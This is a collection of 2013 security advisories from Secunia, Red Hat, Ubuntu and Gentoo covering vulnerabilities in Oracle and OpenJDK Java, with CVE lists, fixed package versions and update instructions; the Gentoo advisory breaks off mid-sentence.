36) An unspecified error in the JSSE component of the server
deployment can be exploited via SSL/TLS to cause a DoS.
37) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
38) An unspecified error in the JSSE component of the client
deployment can be exploited via SSL/TLS to disclose and manipulate
certain data.
The vulnerabilities are reported in the following products:
* JDK and JRE 7 Update 11 and earlier.
* JDK and JRE 6 Update 38 and earlier.
* JDK and JRE 5.0 Update 38 and earlier.
* SDK and JRE 1.4.2_40 and earlier.
SOLUTION:
Apply updates.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
One of the vulnerabilities is reported as a 0-day. It is currently
unclear who reported the remaining vulnerabilities as the Oracle Jave
SE Critical Patch Update for February 2013 only provides a bundled
list of credits. This section will be updated when/if the original
reporter provides more information.
ORIGINAL ADVISORY:
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
http://www.oracle.com/technetwork/topics/security/javacpufeb2013verbose-1841196.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201302-0224 | CVE-2013-0446 | Oracle Java contains multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than other CVEs listed in the February 2013 CPU. Java 7 Update 11, Java 6 Update 38, and earlier versions of Java contain vulnerabilities that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. This vulnerability February 2013 CPU This is a different vulnerability than the other vulnerabilities listed on the list.Information is obtained by a third party, information is altered, or service operation is interrupted. (DoS) An attack may be carried out.
The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component.
Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it.
This vulnerability affects the following supported versions:
7 Update 11, 6 Update 38. In a typical operating environment, these are of low security risk as
the runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.6.0-ibm security update
Advisory ID: RHSA-2013:0625-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0625.html
Issue date: 2013-03-11
CVE Names: CVE-2012-1541 CVE-2012-3213 CVE-2012-3342
CVE-2013-0351 CVE-2013-0409 CVE-2013-0419
CVE-2013-0423 CVE-2013-0424 CVE-2013-0425
CVE-2013-0426 CVE-2013-0427 CVE-2013-0428
CVE-2013-0432 CVE-2013-0433 CVE-2013-0434
CVE-2013-0435 CVE-2013-0438 CVE-2013-0440
CVE-2013-0441 CVE-2013-0442 CVE-2013-0443
CVE-2013-0445 CVE-2013-0446 CVE-2013-0450
CVE-2013-0809 CVE-2013-1473 CVE-2013-1476
CVE-2013-1478 CVE-2013-1480 CVE-2013-1481
CVE-2013-1486 CVE-2013-1487 CVE-2013-1493
=====================================================================
1. Summary:
Updated java-1.6.0-ibm packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, ppc, s390x, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Detailed
vulnerability descriptions are linked from the IBM Security alerts page,
listed in the References section. (CVE-2012-1541, CVE-2012-3213,
CVE-2012-3342, CVE-2013-0351, CVE-2013-0409, CVE-2013-0419, CVE-2013-0423,
CVE-2013-0424, CVE-2013-0425, CVE-2013-0426, CVE-2013-0427, CVE-2013-0428,
CVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438,
CVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445,
CVE-2013-0446, CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1486, CVE-2013-1487,
CVE-2013-1493)
All users of java-1.6.0-ibm are advised to upgrade to these updated
packages, containing the IBM Java SE 6 SR13 release. All running instances
of IBM Java must be restarted for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)
906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)
906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)
906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)
906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)
906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)
906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)
906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)
906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)
907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)
907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting)
907224 - CVE-2013-1481 Oracle JDK: unspecified vulnerability fixed in 6u39 (Sound)
907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX)
907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)
907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)
907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)
907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)
907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)
907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)
907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)
907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)
913014 - CVE-2013-1486 OpenJDK: MBeanServer insufficient privilege restrictions (JMX, 8006446)
913030 - CVE-2013-1487 Oracle JDK: unspecified vulnerability fixed in 6u41 and 7u15 (Deployment)
917550 - CVE-2013-0809 OpenJDK: Specially crafted sample model integer overflow (2D, 8007014)
917553 - CVE-2013-1493 OpenJDK: CMM malformed raster memory corruption (2D, 8007675)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.6.0-ibm-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-accessibility-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
x86_64:
java-1.6.0-ibm-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-accessibility-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.6.0-ibm-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-accessibility-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
ppc:
java-1.6.0-ibm-1.6.0.13.0-1jpp.2.el5_9.ppc.rpm
java-1.6.0-ibm-1.6.0.13.0-1jpp.2.el5_9.ppc64.rpm
java-1.6.0-ibm-accessibility-1.6.0.13.0-1jpp.2.el5_9.ppc.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.2.el5_9.ppc.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.2.el5_9.ppc64.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.2.el5_9.ppc.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.2.el5_9.ppc64.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.2.el5_9.ppc.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.2.el5_9.ppc64.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.2.el5_9.ppc.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.2.el5_9.ppc64.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.2.el5_9.ppc.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.2.el5_9.ppc.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.2.el5_9.ppc64.rpm
s390x:
java-1.6.0-ibm-1.6.0.13.0-1jpp.2.el5_9.s390.rpm
java-1.6.0-ibm-1.6.0.13.0-1jpp.2.el5_9.s390x.rpm
java-1.6.0-ibm-accessibility-1.6.0.13.0-1jpp.2.el5_9.s390x.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.2.el5_9.s390.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.2.el5_9.s390x.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.2.el5_9.s390.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.2.el5_9.s390x.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.2.el5_9.s390.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.2.el5_9.s390x.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.2.el5_9.s390.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.2.el5_9.s390x.rpm
x86_64:
java-1.6.0-ibm-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-accessibility-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.2.el5_9.i386.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.2.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.6.0-ibm-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
x86_64:
java-1.6.0-ibm-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.6.0-ibm-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.6.0-ibm-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
ppc64:
java-1.6.0-ibm-1.6.0.13.0-1jpp.3.el6_4.ppc64.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.3.el6_4.ppc64.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.ppc.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.ppc64.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.3.el6_4.ppc64.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.3.el6_4.ppc64.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.3.el6_4.ppc64.rpm
s390x:
java-1.6.0-ibm-1.6.0.13.0-1jpp.3.el6_4.s390x.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.3.el6_4.s390x.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.s390.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.s390x.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.3.el6_4.s390x.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.3.el6_4.s390x.rpm
x86_64:
java-1.6.0-ibm-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.6.0-ibm-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
x86_64:
java-1.6.0-ibm-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-demo-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.i686.rpm
java-1.6.0-ibm-devel-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-javacomm-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-jdbc-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-plugin-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
java-1.6.0-ibm-src-1.6.0.13.0-1jpp.3.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-1541.html
https://www.redhat.com/security/data/cve/CVE-2012-3213.html
https://www.redhat.com/security/data/cve/CVE-2012-3342.html
https://www.redhat.com/security/data/cve/CVE-2013-0351.html
https://www.redhat.com/security/data/cve/CVE-2013-0409.html
https://www.redhat.com/security/data/cve/CVE-2013-0419.html
https://www.redhat.com/security/data/cve/CVE-2013-0423.html
https://www.redhat.com/security/data/cve/CVE-2013-0424.html
https://www.redhat.com/security/data/cve/CVE-2013-0425.html
https://www.redhat.com/security/data/cve/CVE-2013-0426.html
https://www.redhat.com/security/data/cve/CVE-2013-0427.html
https://www.redhat.com/security/data/cve/CVE-2013-0428.html
https://www.redhat.com/security/data/cve/CVE-2013-0432.html
https://www.redhat.com/security/data/cve/CVE-2013-0433.html
https://www.redhat.com/security/data/cve/CVE-2013-0434.html
https://www.redhat.com/security/data/cve/CVE-2013-0435.html
https://www.redhat.com/security/data/cve/CVE-2013-0438.html
https://www.redhat.com/security/data/cve/CVE-2013-0440.html
https://www.redhat.com/security/data/cve/CVE-2013-0441.html
https://www.redhat.com/security/data/cve/CVE-2013-0442.html
https://www.redhat.com/security/data/cve/CVE-2013-0443.html
https://www.redhat.com/security/data/cve/CVE-2013-0445.html
https://www.redhat.com/security/data/cve/CVE-2013-0446.html
https://www.redhat.com/security/data/cve/CVE-2013-0450.html
https://www.redhat.com/security/data/cve/CVE-2013-0809.html
https://www.redhat.com/security/data/cve/CVE-2013-1473.html
https://www.redhat.com/security/data/cve/CVE-2013-1476.html
https://www.redhat.com/security/data/cve/CVE-2013-1478.html
https://www.redhat.com/security/data/cve/CVE-2013-1480.html
https://www.redhat.com/security/data/cve/CVE-2013-1481.html
https://www.redhat.com/security/data/cve/CVE-2013-1486.html
https://www.redhat.com/security/data/cve/CVE-2013-1487.html
https://www.redhat.com/security/data/cve/CVE-2013-1493.html
https://access.redhat.com/security/updates/classification/#critical
https://www.ibm.com/developerworks/java/jdk/alerts/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFRPjacXlSAg2UNWIIRAocMAKCHwniGV/DegcuINmJ4h95xUcpABQCeMoZu
7MA85UeOGKgGVLJXvZt6eVk=
=xr8S
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ============================================================================
Ubuntu Security Notice USN-1724-1
February 14, 2013
openjdk-6, openjdk-7 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK.
Software Description:
- openjdk-7: Open Source Java implementation
- openjdk-6: Open Source Java implementation
Details:
Several vulnerabilities were discovered in the OpenJDK JRE related to
information disclosure and data integrity. An attacker could exploit these
to cause a denial of service. (CVE-2012-1541, CVE-2012-3342, CVE-2013-0351,
CVE-2013-0419, CVE-2013-0423, CVE-2013-0446, CVE-2012-3213, CVE-2013-0425,
CVE-2013-0426, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0441,
CVE-2013-0442, CVE-2013-0445, CVE-2013-0450, CVE-2013-1475, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480)
Vulnerabilities were discovered in the OpenJDK JRE related to information
disclosure. (CVE-2013-0409, CVE-2013-0434, CVE-2013-0438)
Several data integrity vulnerabilities were discovered in the OpenJDK JRE.
(CVE-2013-0424, CVE-2013-0427, CVE-2013-0433, CVE-2013-1473)
Several vulnerabilities were discovered in the OpenJDK JRE related to
information disclosure and data integrity. (CVE-2013-0432, CVE-2013-0435,
CVE-2013-0443)
A vulnerability was discovered in the OpenJDK JRE related to availability.
An attacker could exploit this to cause a denial of service.
(CVE-2013-0440)
A vulnerability was discovered in the OpenJDK JRE related to information
disclosure and data integrity. An attacker could exploit this to cause a
denial of service. This issue only affected Ubuntu 12.10. (CVE-2013-0444)
A data integrity vulnerability was discovered in the OpenJDK JRE. This
issue only affected Ubuntu 12.10. (CVE-2013-0448)
An information disclosure vulnerability was discovered in the OpenJDK JRE.
This issue only affected Ubuntu 12.10. (CVE-2013-0449)
A vulnerability was discovered in the OpenJDK JRE related to information
disclosure and data integrity. An attacker could exploit this to cause a
denial of service. (CVE-2013-1481)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.10:
icedtea-7-jre-jamvm 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-headless 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-lib 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-zero 7u13-2.3.6-0ubuntu0.12.10.1
Ubuntu 12.04 LTS:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.12.04.2
icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.12.04.2
Ubuntu 11.10:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.11.10.2
icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.11.10.2
Ubuntu 10.04 LTS:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.10.04.2
This update uses a new upstream release which includes additional bug
fixes. After a standard system update you need to restart any Java
applications or applets to make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Oracle JRE/JDK: Multiple vulnerabilities
Date: January 27, 2014
Bugs: #404071, #421073, #433094, #438706, #451206, #455174,
#458444, #460360, #466212, #473830, #473980, #488210, #498148
ID: 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the Oracle JRE/JDK,
allowing attackers to cause unspecified impact.
Background
==========
The Oracle Java Development Kit (JDK) (formerly known as Sun JDK) and
the Oracle Java Runtime Environment (JRE) (formerly known as Sun JRE)
provide the Oracle Java platform (formerly known as Sun Java Platform).
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jdk <= 1.6.0.45 Vulnerable!
2 dev-java/oracle-jdk-bin < 1.7.0.51 >= 1.7.0.51 *
3 dev-java/sun-jre-bin <= 1.6.0.45 Vulnerable!
4 dev-java/oracle-jre-bin < 1.7.0.51 >= 1.7.0.51 *
5 app-emulation/emul-linux-x86-java
< 1.7.0.51 >= 1.7.0.51 *
-------------------------------------------------------------------
NOTE: Certain packages are still vulnerable. Users should migrate
to another package if one is available or wait for the
